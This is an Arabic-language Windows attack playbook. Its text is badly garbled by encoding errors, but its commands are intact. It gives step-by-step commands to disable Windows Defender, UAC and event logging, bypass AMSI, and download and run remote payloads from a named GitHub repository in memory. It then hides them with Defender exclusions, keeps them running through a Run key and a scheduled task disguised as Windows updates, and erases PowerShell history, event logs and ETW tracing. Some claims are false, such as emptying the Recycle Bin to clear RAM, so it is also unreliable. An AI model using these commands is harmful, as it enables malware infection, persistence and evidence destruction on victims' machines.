				===   ุตูุงุญูุงุช ===




๐ข ุงูุทุฑููุฉ 1: ุนุจุฑ "Run" (Win + R)

1 . ุงุถุบุท ุนูู Win + R ููุชุญ ูุงูุฐุฉ "Run".
2 . ุงูุชุจ:
				powershell
3 . ุงุถุบุท Ctrl + Shift + Enter ุจุฏููุง ูู ุงูุถุบุท ุนูู "OK" โ ูุฐุง ููุชุญ PowerShell ููุณุคูู ูุจุงุดุฑุฉู.
โ ูุจุงุดุฑุฉู ุฅูู PowerShell ุจุตูุงุญูุงุช ุงููุณุคูู!


๐ก ุงูุทุฑููุฉ 2: ุนุจุฑ ุงูุจุญุซ ูู ูุงุฆูุฉ Start

1 . ุงุถุบุท ุนูู Win ููุชุญ ูุงุฆูุฉ "Start".
2 . ุงูุชุจ:
				powershell
3. ุงููุฑ ุจุฒุฑ ุงููุฃุฑุฉ ุงูุฃููู ุนูู Windows PowerShell.





				===   ุชุนุทูู ุงูุญูุงูุฉ ===




1๏ธโฃ ุชุนุทููู ูุคูุชูุง ุจุงุณุชุฎุฏุงู PowerShell
	Set-MpPreference -DisableRealtimeMonitoring $true
โ ูุฐุง ูุนุทูู ูุคูุชูุงุ ูููู ูุฏ ูุนูุฏ ุฅูู ุงูุชุดุบูู ุจุนุฏ ุฅุนุงุฏุฉ ุชุดุบูู ุงููุธุงู.


2๏ธโฃ ุชุนุทููู ุจุงููุงูู ุนุจุฑ Group Policy (GPO)
	New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force
โ ูุฐุง ูุนุทูู ุจุดูู ุฏุงุฆู ุญุชู ูุชู ุฅุนุงุฏุฉ ุชูุนููู ูุฏูููุง!


3๏ธโฃ ุฅููุงู ุฎุฏูุฉ Windows Defender ููุงุฆููุง
sc stop WinDefend
sc config WinDefend start= disabled
โ ูุฐุง ูููุน ุชุดุบูู Windows Defender ุญุชู ุจุนุฏ ุฅุนุงุฏุฉ ุงูุชุดุบูู.


4๏ธโฃ ุญุฐู Windows Defender ููุงุฆููุง ูู ุงููุธุงู (ุฎุทูุฑ!)
	Uninstall-WindowsFeature -Name Windows-Defender-Features -Remove
๐จ ุชุญุฐูุฑ: ูุฐู ุงูุฎุทูุฉ ุชุญุฐู Defender ุชูุงููุง ููุง ูููู ุงุณุชุนุงุฏุชู ุจุณูููุฉ.


โ ูุฌุนู ุงููุฌูู ุฃููู:
ุชุนุทูู UAC ูุชุฌูุจ ุงูููุงูุฐ ุงูุชุญุฐูุฑูุฉ:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

ุฅููุงู Windows Event Logging ุญุชู ูุง ูุชู ุชุณุฌูู ุงูุฃูุดุทุฉ:
wevtutil cl System
wevtutil cl Security




					===   ุงููุฌูู ===




1๏ธโฃ ุชุฌุงูุฒ AMSI ู Windows Defender ุนูุฏ ุชุดุบูู ุงูุจุงูููุฏ
ูุฏุง Windows Defender ูููู ุจูุญุต AMSIScanBuffer ูููุน ุชุดุบูู ุณูุฑูุจุชุงุช PowerShell ุงูุถุงุฑุฉุ ูุฐุง ูุญุชุงุฌ ุฅูู ุชุนุทููู ูุคูุชูุง:
๐ ุชุฌุงูุฒ AMSI ูุจุงุดุฑุฉ ูู PowerShell.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}
โ ูุฐู ุงูุฎุทูุฉ ุชููุน AMSI ูู ูุญุต ุฃู ุณูุฑูุจุชุงุช ูุชู ุชุดุบูููุง ุจุนุฏ ูุฐุง ุงูุณุทุฑ.


2๏ธโฃ ุชุญููู ุงูุจุงูููุฏ ูุจุงุดุฑุฉ ูู GitHub ูุชุดุบููู ูู ุงูุฐุงูุฑุฉ
ููุญูู ููููุฐ ุณูุฑูุจุช system.ps1 ุงูููุฌูุฏ ูู ุงูุฑุงุจุท ุงูุฐู ูุฏูุชู ุฏูู ุญูุธู ุนูู ุงููุฑุต:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/anaslabrini/anasans005/main/system.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/anaslabrini/anasans005/main/system.exe')
โ ุณูููู ูุฐุง ุงูุฃูุฑ ุจุชูุฒูู ูุชุดุบูู system.ps1 ูุจุงุดุฑุฉ ุฏูู ุชุฑู ุฃู ุฃุซุฑ ุนูู ุงููุฑุต.
โ ุณูููู ูุฐุง ุงูุฃูุฑ ุจุชูุฒูู ูุชุดุบูู system.exe ูุจุงุดุฑุฉ ุฏูู ุชุฑู ุฃู ุฃุซุฑ ุนูู ุงููุฑุต.


3๏ธโฃ ุฅุถุงูุฉ ุงุณุชุซูุงุกุงุช ูู Windows Defender ูููุน ุญุฐู ุงูุจุงูููุฏ
ูุจู ุชูููุฐ ุงูุฎุทูุฉ ุงูุชุงููุฉุ ูุฌุจ ุงูุชุฃูุฏ ูู ุฃู Windows Defender ูู ูุญุฐู ุงููููุงุช:
powershell -ep Bypass -c "Add-MpPreference -ExclusionPath '$env:APPDATA\system.exe'"
powershell -ep Bypass -c "Add-MpPreference -ExclusionPath '$env:APPDATA\system.ps1'"
โ ุณูููุน ูุฐุง Windows Defender ูู ูุญุต ูุฐู ุงููููุงุช ูู ุงููุณุชูุจู.


4๏ธโฃ ุฅูุดุงุก ุงุณุชูุฑุงุฑูุฉ ููุจุงูููุฏ ุจุนุฏ ุฅุนุงุฏุฉ ุงูุชุดุบูู
ุญุชู ูู ุชู ุฅููุงู ุชุดุบูู ุงูุฌูุงุฒ ุฃู ุฅุนุงุฏุฉ ุชุดุบูููุ ูุฑูุฏ ุฃู ูุนูู ุงูุจุงูููุฏ ุชููุงุฆููุง.

๐ ุงูุทุฑููุฉ 1: ุฅุถุงูุฉ ุณูุฑูุจุช ููู Registry ููุนูู ุนูุฏ ูู ุชุดุบูู
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "powershell -ep Bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/anaslabrini/anasans005/main/system.ps1')" /f
โ ูุฐุง ุณูุถูู ุฃู ุงูุณูุฑูุจุช system.ps1 ุณูุชู ุชุดุบููู ุชููุงุฆููุง ุนูุฏ ูู ุชุดุบูู ูููุธุงู.

๐ ุงูุทุฑููุฉ 2: ุฅูุดุงุก Scheduled Task ูุชุดุบูู ุงูุจุงูููุฏ ูู ุฏูููุฉ
schtasks /create /tn "Windows Security Update" /tr "powershell -ep Bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/anaslabrini/anasans005/main/system.ps1')" /sc minute /mo 1 /ru System /f
โ ูุฐุง ุณูุถูู ุชุดุบูู ุงูุจุงูููุฏ ุชููุงุฆููุง ูู ุฏูููุฉ ุญุชู ูู ุชู ุญุฐู ููุชุงุญ ุงูู Registry.

			
			
			
			===  ุญุฏู ุงูุงุซุฑ ===


๐ด 2๏ธโฃ ุญุฐู ุงูุฃูุงูุฑ ูู ุณุฌู PowerShell (History)
ูู ุฃูุงูุฑ PowerShell ุงูุชู ููุฐุชูุง ูุณุฌูุฉ ูู ููู historyุ ูุฐุง ูุฌุจ ูุณุญู:
Remove-Item (Get-PSReadlineOption).HistorySavePath -Force
Clear-History
โ ุงูุขู ูู ูุณุชุทูุน ุฃู ุดุฎุต ูุนุฑูุฉ ุงูุฃูุงูุฑ ุงูุชู ููุฐุชูุง.


๐ด 3๏ธโฃ ุญุฐู ุณุฌูุงุช Windows (Event Logs)
๐ ูููุฏูุฒ ูุณุฌู ูู ุดูุก ูู Event Logsุ ูุฐุง ูุฌุจ ูุณุญูุง ููุงุฆููุง:
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
โ ูุฐุง ูุญุฐู ุฌููุน ุงูุณุฌูุงุช ุงูุฃูููุฉุ ููุง ูุฌุนู ูู ุงูุตุนุจ ุชุนูุจ ุงููุดุงุท ุงููุดุจูู.


๐ด 7๏ธโฃ ุชุนุทูู ุชุณุฌูู ุงูุฃุญุฏุงุซ (ETW) ูููุน ุงููุฑุงูุจุฉ
ูุฏุง ๐ Windows ูุณุชุฎุฏู Event Tracing for Windows (ETW) ูุชุณุฌูู ุงููุดุงุท ุงููุดุจููุ ูุฐูู ููููู ุชุนุทููู:
logman stop "Windows PowerShell" -ets
logman stop "Microsoft-Windows-PowerShell/Operational" -ets
โ ุงูุขู ูู ูุชู ุชุณุฌูู ุฃู ูุดุงุท ูู PowerShellุ ููุง ูุตุนูุจ ุนูููุฉ ุงูุชุญููู ุงูุฌูุงุฆู.


๐ด 8๏ธโฃ ูุณุญ ุฐุงูุฑุฉ ุงููุตูู ุงูุนุดูุงุฆู (RAM) ูููุน ุงูุชุญููู ุงููุจุงุดุฑ
๐ ุฅุฐุง ููุช ุชุณุชุฎุฏู ุฃุฏูุงุช ูุซู Mimikatz ุฃู Meterpreterุ ููู ุงูุฃูุถู ูุณุญ ุงูู RAM ูููุน ุงูุชุดุงู ุฃู ุจูุงูุงุช ูุฎุฒูุฉ ูููุง:
Clear-RecycleBin -Force
โ ูุญุฐู ุงูุจูุงูุงุช ุงูุนุงููุฉ ูู ุงูุฐุงูุฑุฉุ ููููู ุฃูุถูุง ุฅุนุงุฏุฉ ุชุดุบูู ุงูุฌูุงุฒ.

